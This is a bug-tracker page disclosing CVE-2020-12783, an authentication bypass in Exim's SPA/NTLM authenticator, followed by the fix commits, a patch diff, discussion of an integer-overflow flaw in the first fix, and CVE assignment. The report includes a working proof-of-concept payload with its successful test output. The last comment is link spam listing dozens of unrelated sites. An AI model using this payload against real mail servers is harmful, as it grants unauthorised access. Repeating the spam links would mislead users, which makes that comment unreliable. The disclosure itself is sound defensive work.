Bug 2571 - (CVE-2020-12783) Out-of-bound buffer read leads to Authentication Bypass in Exim SPA authentication method
(CVE-2020-12783)
Out-of-bound buffer read leads to Authentication Bypass in Exim SPA authentic...
Status: RESOLVED FIXED
Product: Exim
Classification: Unclassified
Component: SMTP Authentication
4.93
x86-64 Linux
: medium security
: Exim 4.94
Assigned To: Jeremy Harris
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2020-05-05 18:17 UTC by Orange Tsai
Modified: 2022-02-06 15:09 UTC (History)
5 users (show)

See Also:


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Orange Tsai 2020-05-05 18:17:39 UTC
Hi, Exim security team. 

I am Orange Tsai from DEVCORE security team. We just did a little audit on authentication mechanisms, and found a out-of-bound buffer read on SPA implementation.

In `spa.c`, there is no check on the user-supplied NTLM authentication message. Since NTLM is an encoded structure. An attacker can supply customized `length` and `offset` to read arbitrary memory address.

For example:

The SPA username/password challenge check is in `spa.c#248`.
https://github.com/Exim/exim/blob/master/src/src/auths/spa.c#L249

Since we control whole the `responseptr`, we can adjust the `offset` to the address of `ntRespData` to bypass this authentication. Here is the PoC:

```
$ (echo 'EHLO test.org'; echo AUTH NTLM; echo "AAAA";    echo -ne
 'o\x00r\x00a\x00n\x00g\x00e\x00\x00BDDCCCCBBGG\x70\x04\x00\x00BBCCCC\x0e\x00\x0e\x00\x0e\x00\x00\x00\x00\x00' | b
ase64 -w0 ; echo ; echo QUIT) | ./exim -bh 127.0.0.1

**** SMTP testing session as if from host 127.0.0.1
**** but without any ident (RFC 1413) callback.
**** This is not for real!

>>> host in hosts_connection_nolog? no (option unset)
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for 127.0.0.1
>>> IP address lookup using gethostbyaddr()
>>> IP address lookup yielded "localhost.localdomain"
>>>   alias "localhost"
>>> no IP addresses found for localhost.localdomain
>>> no IP addresses found for localhost
>>> 127.0.0.1 does not match any IP address for localhost.localdomain
>>> host in host_reject_connection? no (option unset)
>>> host in sender_unqualified_hosts? no (option unset)
>>> host in recipient_unqualified_hosts? no (option unset)
>>> host in helo_verify_hosts? no (option unset)
>>> host in helo_try_verify_hosts? no (option unset)
>>> host in helo_accept_junk_hosts? no (option unset)
220 ubuntu ESMTP Exim 4.93 Sun, 03 May 2020 10:25:45 +0800
>>> test.org in helo_lookup_domains? no (end of list)
>>> host in dsn_advertise_hosts? no (option unset)
>>> host in pipelining_advertise_hosts? yes (matched "*")
>>> host in auth_advertise_hosts? yes (matched "*")
>>> host in chunking_advertise_hosts? yes (matched "*")
>>> host in tls_advertise_hosts? yes (matched "*")
250-ubuntu Hello test.org [127.0.0.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH NTLM
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
334 NTLM supported
334 TlRMTVNTUAACAAAAAAAAAAAoAAABggAAEDPISlBkLXQAAAAAAAAAAAAAAAAAAAAA
>>> spa authenticator server_condition:
>>>   $auth1 = orange
>>>   $1 = orange
235 Authentication succeeded
221 ubuntu closing connection
```


Our configuration:

```
$ cat /usr/exim/configure
...

spa:
  driver = spa
  public_name = NTLM
  server_password = ${lookup{$auth1}lsearch{/etc/exim/spa_clearpass}{$value}fail}
...

$ cat /etc/exim/spa_clearpass
orange:orange
```
Comment 1 Git Commit 2020-05-05 21:27:04 UTC
Git commit: https://git.exim.org/exim.git/commitdiff/57aa14b216432be381b6295c312065b2fd034f86

commit 57aa14b216432be381b6295c312065b2fd034f86
Author:     Jeremy Harris <jgh146exb@wizmail.org>
AuthorDate: Tue May 5 21:02:14 2020 +0100
Commit:     Jeremy Harris <jgh146exb@wizmail.org>
CommitDate: Tue May 5 21:02:14 2020 +0100

    fix spa authenticator, checking client-supplied data before using it.  bug 2571
----
 doc/doc-txt/ChangeLog    |   5 ++
 src/src/auths/auth-spa.c | 120 +++++++++++++++++++++++------------------------
 src/src/auths/spa.c      |  20 ++++++--
 3 files changed, 82 insertions(+), 63 deletions(-)
Comment 2 Orange Tsai 2020-05-06 06:55:54 UTC
Hi! The patch just checks "pointer + offset" is smaller than the end of `responseptr`. However, the check condition is prone to integer overflow. An attacker can make a crash on 32-bit system.
Comment 3 Git Commit 2020-05-07 10:27:06 UTC
Git commit: https://git.exim.org/exim.git/commitdiff/a04174dc2a84ae1008c23b6a7109e7fa3fb7b8b0

commit a04174dc2a84ae1008c23b6a7109e7fa3fb7b8b0
Author:     Jeremy Harris <jgh146exb@wizmail.org>
AuthorDate: Wed May 6 22:31:25 2020 +0100
Commit:     Jeremy Harris <jgh146exb@wizmail.org>
CommitDate: Wed May 6 22:31:25 2020 +0100

    Rework SPA fix to avoid overflows.  Bug 2571
    
    Amends: 57aa14b216
---
 src/src/auths/spa.c | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/src/src/auths/spa.c b/src/src/auths/spa.c
index f83d114..ff90d33 100644
--- a/src/src/auths/spa.c
+++ b/src/src/auths/spa.c
@@ -141,6 +141,7 @@ SPAAuthResponse  response;
 SPAAuthResponse  *responseptr = &response;
 uschar msgbuf[2048];
 uschar *clearpass, *s;
+unsigned off;
 
 /* send a 334, MS Exchange style, and grab the client's request,
 unless we already have it via an initial response. */
@@ -187,10 +188,13 @@ that causes failure if the size of msgbuf is exceeded. ****/
 
   {
   int i;
-  char * p = (CS responseptr) + IVAL(&responseptr->uUser.offset,0);
+  char * p;
   int len = SVAL(&responseptr->uUser.len,0)/2;
 
-  if (p + len*2 >= CS (responseptr+1))
+  if (  (off = IVAL(&responseptr->uUser.offset,0)) >= sizeof(SPAAuthResponse)
+     || len >= sizeof(responseptr->buffer)/2
+     || (p = (CS responseptr) + off) + len*2 >= CS (responseptr+1)
+     )
     {
     DEBUG(D_auth)
       debug_printf("auth_spa_server(): bad uUser spec in response\n");
@@ -242,13 +246,14 @@ spa_smb_nt_encrypt(clearpass, challenge.challengeData, ntRespData);
 
 /* compare NT hash (LM may not be available) */
 
-s = (US responseptr) + IVAL(&responseptr->ntResponse.offset,0);
-if (s + 24 >= US (responseptr+1))
+off = IVAL(&responseptr->ntResponse.offset,0);
+if (off >= sizeof(SPAAuthResponse) - 24)
   {
   DEBUG(D_auth)
     debug_printf("auth_spa_server(): bad ntRespData spec in response\n");
   return FAIL;
   }
+s = (US responseptr) + off;
 
 if (memcmp(ntRespData, s, 24) == 0)
   return auth_check_serv_cond(ablock);	/* success. we have a winner. */
Comment 4 Andreas Metzler 2020-05-07 16:57:09 UTC
Should this get a CVE?
Comment 5 Salvatore Bonaccorso 2020-05-11 08:01:16 UTC
Hi Andreas, I requested one from MITRE via the cveform.mitre.org (assuming this was not done yet, but have added a comment that it might have been already requested).
Comment 6 Salvatore Bonaccorso 2020-05-11 15:44:05 UTC
The CVE assigned by MITRE is CVE-2020-12783.
Comment 7 Renaud Allard 2020-05-11 16:21:59 UTC
Now that there is a CVE, I think it deserves a fixes release for distributions.
Comment 8 Jeremy Harris 2020-05-12 21:30:23 UTC
Lacking further substansive comment on the fix, closing.
Comment 9 Simon Marchi 2022-02-06 15:09:26 UTC
Maybe I can check it and also apply for that. Hope it is useful. http://embermanchester.uk

Maybe I can check it and also apply for that. Hope it is useful 
http://www.compilatori.com

Maybe I can check it and also apply for that. Hope it is useful 
http://www.wearelondonmade.com

    Maybe I can check it and also apply for that. Hope it is useful 
http://www.jopspeech.com

   Maybe I can check it and also apply for that. Hope it is useful 
http://joerg.li/

 Maybe I can check it and also apply for that. Hope it is useful 
http://connstr.net/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.slipstone.co.uk/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.logoarts.co.uk/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.acpirateradio.co.uk/

 Maybe I can check it and also apply for that. Hope it is useful 
https://waytowhatsnext.com/

 Maybe I can check it and also apply for that. Hope it is useful 
https://www.webb-dev.co.uk/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.iu-bloomington.com/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www-look-4.com/

 Maybe I can check it and also apply for that. Hope it is useful 
https://komiya-dental.com/

 Maybe I can check it and also apply for that. Hope it is useful 
https://www.arborconsult.space/

 Maybe I can check it and also apply for that. Hope it is useful 
http://fishingnewsletters.co.uk/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.go-mk-websites.co.uk/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.mconstantine.co.uk/

 Maybe I can check it and also apply for that. Hope it is useful 
http://the-hunters.org/

 Maybe I can check it and also apply for that. Hope it is useful 
http://rhee.tech/

 Maybe I can check it and also apply for that. Hope it is useful 
https://texastourgear.live/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.i-obchody.info/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.caviastal-ruan.nl/

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.dotkraft.com/

 Maybe I can check it and also apply for that. Hope it is useful 

 Maybe I can check it and also apply for that. Hope it is useful 
http://www.hildyphotography.com/

 Maybe I can check it and also apply for that. Hope it is useful 
http://illustratedmind.pl/

 Maybe I can check it and also apply for that. Hope it is useful 
http://ammko.pl/

 Maybe I can check it and also apply for that.  Hope it is useful  Maybe I can check it and also apply for that. http://www.jindorescue.org/

  Hope it is useful Maybe I can check it and also apply for that. Hope it is useful Maybe http://www.pistoneforcongress.net/

  I can check it and also apply for that. Hope it is useful Maybe I can check it and also apply http://ruirui.store/

  for that. Hope it is useful Maybe I can check it and also apply for that. Hope it is useful Maybe I can http://www.foamhands.store/

  check it and also apply for that. Hope it is useful